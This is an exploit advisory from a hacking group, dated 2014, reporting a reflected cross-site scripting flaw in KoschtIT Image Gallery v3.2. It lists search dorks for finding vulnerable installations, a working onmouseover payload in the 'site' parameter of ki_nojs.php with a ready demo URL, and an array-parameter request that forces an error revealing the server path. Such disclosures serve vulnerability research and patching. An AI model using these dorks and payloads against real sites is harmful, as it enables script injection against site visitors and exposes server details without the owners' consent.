#########################################################################
#     __              .__                            .__                #
#    |__|____    ____ |__| ______ ___________ _______|__| ____   ______ #
#    |  \__  \  /    \|  |/  ___//  ___/\__  \\_  __ \  |/ __ \ /  ___/ #
#    |  |/ __ \|   |  \  |\___ \ \___ \  / __ \|  | \/  \  ___/ \___ \  #
#/\__|  (____  /___|  /__/____  >____  >(____  /__|  |__|\___  >____  > #
#\______|    \/     \/        \/     \/      \/              \/     \/  #
#                                                 www.janissaries.org   #
##=====================================================================##  

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 «««:»»»      koschtit_image_gallery(v3.2) Cross Site Scripting             «««:»»»
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : KoschtIT Image Gallery Cross Site Scripting [XSS]
 ./WebApps URL   : http://koschtit.tabere.net/en/#download
 ./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
 ./Security Risk : [ High Level ]
 ./Category XPL  : [ WebApps]
 ./Time & Date   : 11.12.2014. 09:55 PM.
 ./Tested on: [Windos 8]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 #################################################################################

 #
 #
 # Dork : inur:ki_nojs.php?gallery
 #	  inurl:ki_base
 #
 #    #=> Exploit: Cross Site Scripting [XSS]
 #       This vulnerability affects 
      File : ki_base/ki_nojs.php

 # GET input site was set to ' onmouseover=prompt(956927) bad='
 # Demo: 
 # http://[rarget]/ki_base/ki_nojs.php?gallery=gallery2&site=%27%20onmouseover%3dprompt%28956927%29%20bad%3d%27&startfrom=1
 # 

 #    #=> Application error message
 # ki_nojs.php?gallery=gallery2&site=/en/&startfrom[]=18
 # http://[rarget]/ki_base/ki_nojs.php?gallery=gallery2&site=/en/&startfrom[]=18
Fatal error: Unsupported operand types in /home/user/publis_html/script/ki_base/ki_nojs.php on line 365 
 # 
 # 
 # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
 # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony)
 #################################################################################